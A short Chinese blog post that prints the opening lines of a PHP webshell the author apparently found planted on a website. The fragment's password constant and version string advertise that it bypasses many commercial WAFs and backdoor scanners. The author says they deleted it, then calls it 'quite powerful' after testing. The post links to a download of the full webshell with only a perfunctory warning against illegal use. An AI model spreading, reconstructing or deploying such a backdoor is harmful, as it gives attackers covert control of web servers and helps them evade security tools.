木马的开始内容如下
Arno<?php
error_reporting(E_ERROR);
header("content-Type: text/html; charset=gb2312");
ini_set('max_execution_time',100000);
ini_set('memory_limit','256M');
define('PASSWD','21232f297a57a5a743894a0e4a801fc3');/*默认是admin,MD5加密方式*/
define('VERSION','Bypass Waf Php Script(可绕过安全狗、360WAF、百度云、阿里云Waf、牛盾、云盾、以及冷门Waf、市面所有后门检测工具');
define('THISFILE',str_replace(array('','//'),array('/','/'),__FILE__));
define('THISDIR',dirname(THISFILE).'/');
define('ROOTDIR',strtr(THISFILE,array($_SERVER['PHP_SELF'] => '')).'/');
然后没有深究,只是把这个给删除处理
经测试这个木马文件挺强大的
挂马的原文件下载地址:
https://72k.us/file/16922972-422814100
请勿非法使用,谢谢。